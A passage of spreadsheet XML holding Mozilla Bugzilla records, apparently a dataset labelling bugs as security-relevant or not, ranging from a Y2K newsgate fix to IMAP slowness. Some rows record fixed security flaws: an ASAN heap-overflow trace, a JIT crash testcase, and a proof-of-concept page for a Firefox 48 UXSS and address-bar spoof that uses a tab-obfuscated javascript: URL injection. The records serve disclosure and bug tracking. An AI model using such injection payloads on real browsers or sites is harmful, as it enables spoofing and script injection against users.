      <c r="L5495" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5495" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5495" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5495" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5495" t="inlineStr"/>
      <c r="Q5495" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5495" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5495" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T5495" t="n">
        <v>1</v>
      </c>
      <c r="U5495" t="n">
        <v>0</v>
      </c>
      <c r="V5495" t="n">
        <v>23</v>
      </c>
      <c r="W5495" t="inlineStr">
        <is>
          <t>Regression from bug 325079:
The security patch modified the login form to use 'urlbase' for the login form.
The checksetup.pl message, right after performing a clean install, says:
vladd@bugzilla.org is now set up as an administrator account.
Now that you have installed Bugzilla, you should visit the
'Parameters' page (linked in the footer of the Administrator
account) to ensure it is set up as you wish - this includes
setting the 'urlbase' option to the correct url.
So I try to login with the admin account in order to set urlbase, but I'm redirected to http://you-havent-visited-editparams.cgi-yet/</t>
        </is>
      </c>
      <c r="X5495" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5496">
      <c r="A5496" t="n">
        <v>765527</v>
      </c>
      <c r="B5496" t="inlineStr">
        <is>
          <t>2012-06-16 18:11:00 -0700</t>
        </is>
      </c>
      <c r="C5496" t="inlineStr">
        <is>
          <t>Object.defineProperty can shadow |top|</t>
        </is>
      </c>
      <c r="D5496" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:39 -0700</t>
        </is>
      </c>
      <c r="E5496" t="n">
        <v>1</v>
      </c>
      <c r="F5496" t="n">
        <v>1</v>
      </c>
      <c r="G5496" t="n">
        <v>3</v>
      </c>
      <c r="H5496" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5496" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5496" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5496" t="inlineStr">
        <is>
          <t>13 Branch</t>
        </is>
      </c>
      <c r="L5496" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5496" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5496" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5496" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5496" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5496" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5496" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5496" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T5496" t="n">
        <v>1</v>
      </c>
      <c r="U5496" t="n">
        <v>0</v>
      </c>
      <c r="V5496" t="n">
        <v>36</v>
      </c>
      <c r="W5496" t="inlineStr">
        <is>
          <t>Created attachment 633854
shadow top.location test
Filing a new bug, as requested by Boris in Bug 756719 comment 10.
With bug 750307 fixed, the location property itself seems to be hardened well enough, but plugins may try to access it through |top.location| -- for instance, Adobe Flash Player opens javascript:top.location+"__flashplugin_unique__" to determine the page origin. And it is possible to shadow |top| using Object.defineProperty.
Incidentally, Google Chrome seems to disallow redefining |top|.</t>
        </is>
      </c>
      <c r="X5496" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5497">
      <c r="A5497" t="n">
        <v>726502</v>
      </c>
      <c r="B5497" t="inlineStr">
        <is>
          <t>2012-02-12 19:26:04 -0800</t>
        </is>
      </c>
      <c r="C5497" t="inlineStr">
        <is>
          <t>nsDeviceMotion::DeviceMotionChanged may index out of bounds mWindowListeners array</t>
        </is>
      </c>
      <c r="D5497" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5497" t="n">
        <v>1</v>
      </c>
      <c r="F5497" t="n">
        <v>1</v>
      </c>
      <c r="G5497" t="n">
        <v>3</v>
      </c>
      <c r="H5497" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5497" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5497" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5497" t="inlineStr">
        <is>
          <t>12 Branch</t>
        </is>
      </c>
      <c r="L5497" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5497" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5497" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5497" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5497" t="inlineStr">
        <is>
          <t>[sg:critical][qa-]</t>
        </is>
      </c>
      <c r="Q5497" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5497" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5497" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5497" t="n">
        <v>1</v>
      </c>
      <c r="U5497" t="n">
        <v>0</v>
      </c>
      <c r="V5497" t="n">
        <v>24</v>
      </c>
      <c r="W5497" t="inlineStr">
        <is>
          <t>The code dispatches DOM events synchronously, and DOM event listeners can do anything, 
like close windows. As far as I see nothing guarantees that
mWindowListeners is still long enough when next iteration starts (after event dispatch).</t>
        </is>
      </c>
      <c r="X5497" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5498">
      <c r="A5498" t="n">
        <v>712914</v>
      </c>
      <c r="B5498" t="inlineStr">
        <is>
          <t>2011-12-22 04:42:23 -0800</t>
        </is>
      </c>
      <c r="C5498" t="inlineStr">
        <is>
          <t>Disk cache does not verify that it correctly serialized/deserialized security info</t>
        </is>
      </c>
      <c r="D5498" t="inlineStr">
        <is>
          <t>2019-02-12 14:44:26 -0800</t>
        </is>
      </c>
      <c r="E5498" t="n">
        <v>1</v>
      </c>
      <c r="F5498" t="n">
        <v>1</v>
      </c>
      <c r="G5498" t="n">
        <v>3</v>
      </c>
      <c r="H5498" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5498" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5498" t="inlineStr">
        <is>
          <t>Networking: Cache</t>
        </is>
      </c>
      <c r="K5498" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5498" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5498" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5498" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5498" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5498" t="inlineStr">
        <is>
          <t>[sg:moderate][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5498" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5498" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5498" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T5498" t="n">
        <v>1</v>
      </c>
      <c r="U5498" t="n">
        <v>0</v>
      </c>
      <c r="V5498" t="n">
        <v>89</v>
      </c>
      <c r="W5498" t="inlineStr">
        <is>
          <t>If the security info is corrupted for whatever reason, we will silently ignore the corruption. This means we may report the wrong security info and/or make same-origin/mixed-content decisions wrongly.
See
http://mxr.mozilla.org/mozilla-central/source/netwerk/cache/nsDiskCacheEntry.cpp?rev=ec7577dec4fc#90
As a consequence, we will probably have to change the disk cache version, blowing away the user's disk cache when they upgrade, when we resolve bug 697781. I am marking bug 697781 as depending on this one because we should fix this and any similar issues before doing anything that would cause us to need to bump the disk cache version again</t>
        </is>
      </c>
      <c r="X5498" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5499">
      <c r="A5499" t="n">
        <v>1628387</v>
      </c>
      <c r="B5499" t="inlineStr">
        <is>
          <t>2020-04-08 08:41:14 -0700</t>
        </is>
      </c>
      <c r="C5499" t="inlineStr">
        <is>
          <t>remove google analytics</t>
        </is>
      </c>
      <c r="D5499" t="inlineStr">
        <is>
          <t>2020-08-12 12:35:07 -0700</t>
        </is>
      </c>
      <c r="E5499" t="n">
        <v>1</v>
      </c>
      <c r="F5499" t="n">
        <v>1</v>
      </c>
      <c r="G5499" t="n">
        <v>4</v>
      </c>
      <c r="H5499" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5499" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5499" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K5499" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5499" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5499" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5499" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5499" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5499" t="inlineStr"/>
      <c r="Q5499" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5499" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5499" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5499" t="n">
        <v>1</v>
      </c>
      <c r="U5499" t="n">
        <v>0</v>
      </c>
      <c r="V5499" t="n">
        <v>6</v>
      </c>
      <c r="W5499" t="inlineStr">
        <is>
          <t>We have Google Analytics set up with the webapp. I have never looked at the Socorro data ever. I've been on Socorro for 4 years. I'm pretty sure Lonnen and others have used this data in the past. Google Analytics adds some complexity with building static files for the webapp (bug #1314258). Removing it removes the need for that complexity and that'd be nice. I claim, but haven't proved, that google analytics isn't helpful with Socorro since enough of our user base is blocking it that it doesn't tell us much confidently. It doesn't cover API usage, so it's not helpful determining usage of Socorro in key areas (e.g. supersearch). We only support Firefox, so we don't need to know browser usage breakdown.
Given all that, I want to remove it. This bug covers that.</t>
        </is>
      </c>
      <c r="X5499" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5500">
      <c r="A5500" t="n">
        <v>352851</v>
      </c>
      <c r="B5500" t="inlineStr">
        <is>
          <t>2006-09-15 11:40:34 -0700</t>
        </is>
      </c>
      <c r="C5500" t="inlineStr">
        <is>
          <t>[FIX]Reflow count painting got removed in bug 317375</t>
        </is>
      </c>
      <c r="D5500" t="inlineStr">
        <is>
          <t>2018-08-29 15:24:07 -0700</t>
        </is>
      </c>
      <c r="E5500" t="n">
        <v>1</v>
      </c>
      <c r="F5500" t="n">
        <v>1</v>
      </c>
      <c r="G5500" t="n">
        <v>3</v>
      </c>
      <c r="H5500" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5500" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5500" t="inlineStr">
        <is>
          <t>Web Painting</t>
        </is>
      </c>
      <c r="K5500" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5500" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5500" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5500" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5500" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5500" t="inlineStr"/>
      <c r="Q5500" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5500" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5500" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T5500" t="n">
        <v>1</v>
      </c>
      <c r="U5500" t="n">
        <v>0</v>
      </c>
      <c r="V5500" t="n">
        <v>8</v>
      </c>
      <c r="W5500" t="inlineStr">
        <is>
          <t>Bug 317375 removed the DO_GLOBAL_REFLOW_COUNT_DSP and DO_GLOBAL_REFLOW_COUNT_DSP_J macros from nsPresContext.h.  Unfortunately, those were the way that the "Reflow Counts" layout debugger option worked...  These are really useful for evaluating performance issues where "too much reflow" is suspected or known (e.g. bug 320378).
What would it take to restore equivalent functionality in the new world?</t>
        </is>
      </c>
      <c r="X5500" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5501">
      <c r="A5501" t="n">
        <v>787722</v>
      </c>
      <c r="B5501" t="inlineStr">
        <is>
          <t>2012-09-01 13:36:00 -0700</t>
        </is>
      </c>
      <c r="C5501" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in Convolve3x3</t>
        </is>
      </c>
      <c r="D5501" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:52 -0700</t>
        </is>
      </c>
      <c r="E5501" t="n">
        <v>1</v>
      </c>
      <c r="F5501" t="n">
        <v>1</v>
      </c>
      <c r="G5501" t="n">
        <v>3</v>
      </c>
      <c r="H5501" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5501" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5501" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K5501" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5501" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5501" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5501" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5501" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5501" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5501" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5501" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5501" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T5501" t="n">
        <v>1</v>
      </c>
      <c r="U5501" t="n">
        <v>0</v>
      </c>
      <c r="V5501" t="n">
        <v>11</v>
      </c>
      <c r="W5501" t="inlineStr">
        <is>
          <t>Created attachment 657600
Repro-file
Reproducible with ASAN-build from https://people.mozilla.com/~choller/firefox/asan/20120831-mozilla-central-linux64-debug-fcc533f691e9+asan.html
ASAN-report:
==1095== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7fae06810023 at pc 0x7fae417985cc bp 0x7fff9dfb8c80 sp 0x7fff9dfb8c78
READ of size 1 at 0x7fae06810023 thread T0
    #0 0x7fae417985cc in Convolve3x3 /home/attekett/firefox/src/content/svg/content/src/nsSVGFilters.cpp:4926
0x7fae06810023 is located 3 bytes to the right of 4000-byte region [0x7fae0680f080,0x7fae06810020)
allocated by thread T0 here:
    #0 0x422e7c in posix_memalign ??:0
    #1 0x7fae428f6565 in TryAllocAlignedBytes /home/attekett/firefox/src/gfx/thebes/gfxImageSurface.cpp:89
    #2 0x7fae41764886 in nsSVGFE::SetupScalingFilter(nsSVGFilterInstance*, nsSVGFE::Image const*, nsSVGFE::Image const*, nsIntRect const&amp;, nsSVGNumberPair*) /home/attekett/firefox/src/content/svg/content/src/nsSVGFilters.cpp:153
    #3 0x7fae41782077 in nsSVGFELightingElement::Filter(nsSVGFilterInstance*, nsTArray&lt;nsSVGFE::Image const*, nsTArrayDefaultAllocator&gt; const&amp;, nsSVGFE::Image const*, nsIntRect const&amp;) /home/attekett/firefox/src/content/svg/content/src/nsSVGFilters.cpp:5009
    #4 0x7fae4169d8e5 in nsSVGFilterInstance::Render(gfxASurface**) /home/attekett/firefox/src/layout/svg/base/src/nsSVGFilterInstance.cpp:583
    #5 0x7fae416944d4 in nsSVGFilterFrame::PaintFilteredFrame(nsRenderingContext*, nsIFrame*, nsSVGFilterPaintCallback*, nsRect const*) /home/attekett/firefox/src/layout/svg/base/src/nsSVGFilterFrame.cpp:444
.
.
.</t>
        </is>
      </c>
      <c r="X5501" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5502">
      <c r="A5502" t="n">
        <v>1427585</v>
      </c>
      <c r="B5502" t="inlineStr">
        <is>
          <t>2018-01-02 00:52:12 -0800</t>
        </is>
      </c>
      <c r="C5502" t="inlineStr">
        <is>
          <t>Content scripts with match_about_blank are being loaded in to the main process when visiting about: pages</t>
        </is>
      </c>
      <c r="D5502" t="inlineStr">
        <is>
          <t>2020-02-16 17:39:57 -0800</t>
        </is>
      </c>
      <c r="E5502" t="n">
        <v>1</v>
      </c>
      <c r="F5502" t="n">
        <v>1</v>
      </c>
      <c r="G5502" t="n">
        <v>3</v>
      </c>
      <c r="H5502" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5502" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J5502" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5502" t="inlineStr">
        <is>
          <t>59 Branch</t>
        </is>
      </c>
      <c r="L5502" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5502" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5502" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5502" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5502" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main64+]</t>
        </is>
      </c>
      <c r="Q5502" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5502" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5502" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T5502" t="n">
        <v>1</v>
      </c>
      <c r="U5502" t="n">
        <v>0</v>
      </c>
      <c r="V5502" t="n">
        <v>17</v>
      </c>
      <c r="W5502" t="inlineStr">
        <is>
          <t>Created attachment 8939358
borderify-1.0.zip
I noticed an unusual permission warning when first visiting about: pages with an extension installed.
&gt; Error: Permission denied to access property "defaultOptions"  defaults.js:1:1
By looking at the loaded moz-extension:// sources in Browser Toolbox I noticed that content scripts were being loaded as background scripts on visiting an about: page. It only happens with manifests that have both "match_about_blank" and "run_at" "document_start". "matches" does not seem to make any difference. The about: page must be visited for the first time in that window and it does not happen with about:blank.
I modified the manifest of the Borderify example extension and attached it as a test case.
STR:
1. Install modified Borderify extension.
2. Open Browser Toolbox, go to Debugger and note moz-extension:// list of sources.
3. Create a new window and visit about:about.
4. Note borderify.js in list of moz-extension:// sources despite it being a content script.
I'm unsure of security implications so marking this as hidden just in case.</t>
        </is>
      </c>
      <c r="X5502" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5503">
      <c r="A5503" t="n">
        <v>15199</v>
      </c>
      <c r="B5503" t="inlineStr">
        <is>
          <t>1999-09-29 14:04:42 -0700</t>
        </is>
      </c>
      <c r="C5503" t="inlineStr">
        <is>
          <t>newsgate not y2k compliant</t>
        </is>
      </c>
      <c r="D5503" t="inlineStr">
        <is>
          <t>2000-01-18 12:27:17 -0800</t>
        </is>
      </c>
      <c r="E5503" t="n">
        <v>1</v>
      </c>
      <c r="F5503" t="n">
        <v>1</v>
      </c>
      <c r="G5503" t="n">
        <v>5</v>
      </c>
      <c r="H5503" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5503" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J5503" t="inlineStr">
        <is>
          <t>Miscellaneous</t>
        </is>
      </c>
      <c r="K5503" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5503" t="inlineStr">
        <is>
          <t>Sun</t>
        </is>
      </c>
      <c r="M5503" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N5503" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5503" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5503" t="inlineStr"/>
      <c r="Q5503" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5503" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5503" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5503" t="n">
        <v>1</v>
      </c>
      <c r="U5503" t="n">
        <v>0</v>
      </c>
      <c r="V5503" t="n">
        <v>3</v>
      </c>
      <c r="W5503" t="inlineStr">
        <is>
          <t>Need to fix a Y2k bug in newsgate and make a new release.  Possibly this would
be a good time to extricate newsgate from the collabra server and just turn it
into an open-source thing on mozilla.org.</t>
        </is>
      </c>
      <c r="X5503" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5504">
      <c r="A5504" t="n">
        <v>37485</v>
      </c>
      <c r="B5504" t="inlineStr">
        <is>
          <t>2000-04-27 22:28:30 -0700</t>
        </is>
      </c>
      <c r="C5504" t="inlineStr">
        <is>
          <t>Slow loading large IMAP folder (major regression)</t>
        </is>
      </c>
      <c r="D5504" t="inlineStr">
        <is>
          <t>2008-07-31 01:21:41 -0700</t>
        </is>
      </c>
      <c r="E5504" t="n">
        <v>1</v>
      </c>
      <c r="F5504" t="n">
        <v>1</v>
      </c>
      <c r="G5504" t="n">
        <v>3</v>
      </c>
      <c r="H5504" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5504" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J5504" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K5504" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5504" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5504" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N5504" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5504" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5504" t="inlineStr">
        <is>
          <t>[dogfood+] 5/4/2000</t>
        </is>
      </c>
      <c r="Q5504" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5504" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5504" t="inlineStr">
        <is>
          <t>M16</t>
        </is>
      </c>
      <c r="T5504" t="n">
        <v>1</v>
      </c>
      <c r="U5504" t="n">
        <v>0</v>
      </c>
      <c r="V5504" t="n">
        <v>16</v>
      </c>
      <c r="W5504" t="inlineStr">
        <is>
          <t>I have been having trouble, and FINALLY today I got the verification build to 
run (by blowing away my moz*.* in the WinNT directory.
I have a large inbox (about 8000 messages).
I've been running about an hour now, and I've gotten about 2700 loaded.
At this rate, I'll have my mailbox ready to read in about 3 hours.
PR1 was no where near this slow.  It might have to do with scrolling of the pane 
as the messages arrive.  It appears that each new message is sorted into my 
list, and the introduction takes roughly 2-3 seconds per message (at this 2800 
point in the load :-(  ).  
I also noted that the far right column of the message list pane contains the 
"message number" of the most recently loaded message (strange to see the same 
number repeated a ton of times :-/).
I'll marke this as dogfood as soon as it gets entered.  Also note that I'm 
running at 100% CPU utilization (presumably the sorts??), and no visible disk 
activity (i.e., I'm not near thrashing yet.  I have 256Megs, and the total 
memory usage on the system is currently about 188M).</t>
        </is>
      </c>
      <c r="X5504" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5505">
      <c r="A5505" t="n">
        <v>1292159</v>
      </c>
      <c r="B5505" t="inlineStr">
        <is>
          <t>2016-08-04 06:58:10 -0700</t>
        </is>
      </c>
      <c r="C5505" t="inlineStr">
        <is>
          <t>Firefox V48.0 UXSS &amp; Address Bar Spoofing</t>
        </is>
      </c>
      <c r="D5505" t="inlineStr">
        <is>
          <t>2024-05-30 09:19:57 -0700</t>
        </is>
      </c>
      <c r="E5505" t="n">
        <v>1</v>
      </c>
      <c r="F5505" t="n">
        <v>1</v>
      </c>
      <c r="G5505" t="n">
        <v>3</v>
      </c>
      <c r="H5505" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5505" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5505" t="inlineStr">
        <is>
          <t>Networking: File</t>
        </is>
      </c>
      <c r="K5505" t="inlineStr">
        <is>
          <t>48 Branch</t>
        </is>
      </c>
      <c r="L5505" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5505" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5505" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5505" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5505" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+][adv-esr45.5+]</t>
        </is>
      </c>
      <c r="Q5505" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5505" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5505" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T5505" t="n">
        <v>1</v>
      </c>
      <c r="U5505" t="n">
        <v>0</v>
      </c>
      <c r="V5505" t="n">
        <v>40</v>
      </c>
      <c r="W5505" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
Steps to reproduce:
Firefox Version: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
1. Download the poc.zip file
2. Put the p.url file into the Path 'C:/'
3. Open the spoof.html, click the 'sumbit' button, wait and reproduce this issue.
spoof.html:
&lt;form action="file://127.0.0.1/c:/p.url"  target="xx" method="post" onsubmit="setTimeout(k, 2020)" id="c"&gt;
&lt;input type="submit"&gt;a&lt;/input&gt;
&lt;/form&gt;
&lt;script&gt;
function k(){
window.open("ja		vascript:document.writeln('Spoof Google.com&lt;img src=# onerror=alert(location.href)&gt;!!')","xx");
}
&lt;/script&gt;
 You could find more details by watching PoC.mp4 and watch PoC.png
Actual results:
The attacker could spoof and inject javascript code into any web pages. In the PoC, you could find the google.com is spoofed and the same-origin police has been bypassed.
Expected results:
Never change the address bar and navigation utill the page has been full loaded.</t>
        </is>
      </c>
      <c r="X5505" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5506">
      <c r="A5506" t="n">
        <v>1070962</v>
      </c>
      <c r="B5506" t="inlineStr">
        <is>
          <t>2014-09-22 06:10:08 -0700</t>
        </is>
      </c>
      <c r="C5506" t="inlineStr">
        <is>
          <t>Crash [@ js::jit::JitFrameIterator::operator++] with RegExp</t>
        </is>
      </c>
      <c r="D5506" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:45 -0700</t>
        </is>
      </c>
      <c r="E5506" t="n">
        <v>1</v>
      </c>
      <c r="F5506" t="n">
        <v>1</v>
      </c>
      <c r="G5506" t="n">
        <v>3</v>
      </c>
      <c r="H5506" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5506" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5506" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K5506" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5506" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5506" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5506" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5506" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5506" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main35+]</t>
        </is>
      </c>
      <c r="Q5506" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5506" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5506" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T5506" t="n">
        <v>1</v>
      </c>
      <c r="U5506" t="n">
        <v>0</v>
      </c>
      <c r="V5506" t="n">
        <v>44</v>
      </c>
      <c r="W5506" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 5bd6e09f074e (run with --no-threads --fuzzing-safe):
test();
function test() {
  function v() {
    try { 
	test(/x{2147483647,2147483648}x/.test('1'), false); 
    } catch (actual) {}
  }
  v();
}</t>
        </is>
      </c>
      <c r="X5506" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5507">
      <c r="A5507" t="n">
        <v>1287266</v>
      </c>
      <c r="B5507" t="inlineStr">
        <is>
          <t>2016-07-16 03:33:35 -0700</t>
        </is>
      </c>
      <c r="C5507" t="inlineStr">
        <is>
